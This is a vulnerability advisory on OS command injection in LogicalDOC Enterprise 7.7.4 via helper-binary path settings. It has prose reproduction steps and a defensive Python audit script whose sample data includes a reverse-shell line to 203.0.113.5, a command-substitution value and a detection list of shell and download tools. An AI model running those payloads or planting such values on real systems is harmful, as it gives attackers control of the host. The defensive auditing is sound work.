LogicalDOC Enterprise OS Command Execution Vulnerability Allowing Privilege Escalation

Vulnerability

A vulnerability in LogicalDOC Enterprise version 7.7.4 allows authenticated users with access to the settings management feature to execute arbitrary operating system commands. The application lets these users configure the paths of external helper binaries (the antivirus scanner command, the OCR Tesseract path and the command.* conversion tools) and later hands those configured values to the operating system when the corresponding feature runs, so a value that carries a command payload instead of a plain binary path is executed with the privileges of the LogicalDOC service process. What an attacker gains from this depends on the platform and the account the service runs under, ranging from unauthorized access to system resources to execution of arbitrary malicious commands.

Impact

Exploitation of this vulnerability results in unauthorized OS command execution in the context of the LogicalDOC service process. Where that process runs as root (Linux) or SYSTEM (Windows), the attacker obtains those privileges, so the issue amounts to privilege escalation from an authenticated application user to full control of the host; the exact outcome depends on the operating system and the account the service is configured to run as.

Reproduction

To reproduce this vulnerability, log into LogicalDOC Enterprise 7.7.4 and navigate to the settings management feature. There, modify the 'antivirus.command' or 'ocr.Tesseract.path' parameter so that, instead of a plain path to the binary, it contains a command payload, such as a reverse shell command. After saving the settings, the injected command is executed the next time a file is uploaded that matches the criteria for that feature (a file that gets antivirus-scanned or OCR-processed), because the application invokes the configured value to handle the upload. The same weakness can be reproduced through the 'command.convert', 'command.openssl', 'command.gs', 'command.pdftohtml' and 'command.keytool' parameters: these tools are run when the corresponding feature invokes them, and because their output is consumed by the application, an injected command's output can be retrieved as well. When checking an installation, whether for exposure or for signs of prior abuse, review the current values of every one of these settings: anything other than a single absolute path to the expected binary is suspicious.
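The settings review described above can be scripted. The Python audit below is an added example, not code from the advisory or from LogicalDOC: it parses a constructed `key = value` settings dump, checks every sink named in the reproduction notes (the two path settings and every `command.*` key), and reports values that contain shell metacharacters, look like reverse-shell or download payloads, consist of more than one token, are not absolute, or point outside an allowlisted directory. The key names come from the advisory; the dump format, the `command.` prefix match, the allowlisted directories, the payload token list and the sample settings are assumptions. The same `validate_binary_path` check is what a fix would apply at save time, optionally also verifying on disk that the path is an existing executable the service account cannot overwrite.

```python
"""Audit LogicalDOC-style settings for command injection in binary path values.

Added example for this advisory; not LogicalDOC code. The dump format, the
directory allowlist and the payload token list below are assumptions.
"""
import os
import re
import shlex
from dataclasses import dataclass, field

# Settings the advisory names as OS command sinks. Matching every "command."
# key is an assumption that covers the command.* parameters it lists.
SENSITIVE_KEYS = {"antivirus.command", "ocr.Tesseract.path"}
SENSITIVE_PREFIXES = ("command.",)

# Where trusted helper binaries are expected to live (assumed POSIX layout;
# on Windows an installer would substitute the Program Files paths instead).
ALLOWED_DIRS = ("/usr/bin", "/usr/local/bin", "/opt/logicaldoc/bin")

# Characters that let a value escape from "path to a binary" into a shell.
SHELL_META = re.compile(r"[;&|`$<>\n\r]")
# Substrings typical of reverse-shell / download-and-run payloads (constructed list).
SUSPICIOUS = ("/dev/tcp/", "bash -i", "nc -e", "ncat", "powershell",
              "curl ", "wget ", "python -c", "perl -e")


@dataclass
class Finding:
    key: str
    value: str
    reasons: list = field(default_factory=list)


def is_sensitive(key: str) -> bool:
    """True for settings whose value ends up being executed as an OS command."""
    return key in SENSITIVE_KEYS or key.startswith(SENSITIVE_PREFIXES)


def validate_binary_path(value: str, allowed_dirs=ALLOWED_DIRS, check_fs: bool = False) -> list:
    """Return the reasons a configured binary path is unacceptable (empty list = OK).

    Syntactic checks always run. With check_fs=True the path must also be an
    existing executable regular file that the current (service) user cannot write,
    so an attacker cannot swap the binary itself.
    """
    reasons = []
    if SHELL_META.search(value):
        reasons.append("shell metacharacters")
    lowered = value.lower()
    if any(tok in lowered for tok in SUSPICIOUS):
        reasons.append("suspicious payload token")
    try:
        tokens = shlex.split(value)
    except ValueError:
        return reasons + ["unparseable quoting"]
    if len(tokens) != 1:
        reasons.append("expected a single executable path, got %d tokens" % len(tokens))
    exe = tokens[0] if tokens else ""
    if not os.path.isabs(exe):
        reasons.append("not an absolute path")
    else:
        norm = os.path.normpath(exe)
        if not any(norm.startswith(d + os.sep) for d in allowed_dirs):
            reasons.append("outside allowlisted directories")
    if check_fs and exe:
        if not os.path.isfile(exe) or not os.access(exe, os.X_OK):
            reasons.append("not an existing executable file")
        elif os.access(exe, os.W_OK):
            reasons.append("writable by the service account")
    return reasons


def parse_settings(text: str) -> dict:
    """Parse 'key = value' lines; '#' starts a comment. Constructed dump format."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_settings(text: str) -> list:
    """Run validate_binary_path over every sensitive setting in a dump."""
    findings = []
    for key, value in parse_settings(text).items():
        if not is_sensitive(key):
            continue
        reasons = validate_binary_path(value)
        if reasons:
            findings.append(Finding(key, value, reasons))
    return findings


# Constructed sample dump: two clean entries, one reverse shell, one command
# substitution, and a binary relocated to a world-writable directory.
SAMPLE_SETTINGS = """\
# constructed settings dump, not a real LogicalDOC export
antivirus.command = /usr/bin/clamscan
ocr.Tesseract.path = /usr/bin/tesseract; bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
command.convert = /usr/local/bin/convert
command.gs = $(id > /tmp/gs.out)
command.openssl = /tmp/openssl
gui.theme = default
"""

if __name__ == "__main__":
    for f in audit_settings(SAMPLE_SETTINGS):
        print("%-22s %-60s %s" % (f.key, f.value[:60], "; ".join(f.reasons)))
```

Run against the sample dump, the script flags `ocr.Tesseract.path` (metacharacters and a reverse-shell token), `command.gs` (command substitution, not a path) and `command.openssl` (a binary outside the allowlist, which is the quieter variant of the same attack: the service would run whatever an attacker drops in /tmp). The single-token rule deliberately rejects arguments inside the setting; if a tool genuinely needs fixed arguments, they belong in code, passed to the process as separate argv entries, never concatenated into a shell string built from configuration.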

Added: Dec 24, 2025, 8:21 PM
Updated: Dec 24, 2025, 9:26 PM

Vulnerability Rating

Custom Algorithm

spread          1.9
impact         10.0
exploitability  6.6
remediation     0.0
relevance       1.6
threat          6.4
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.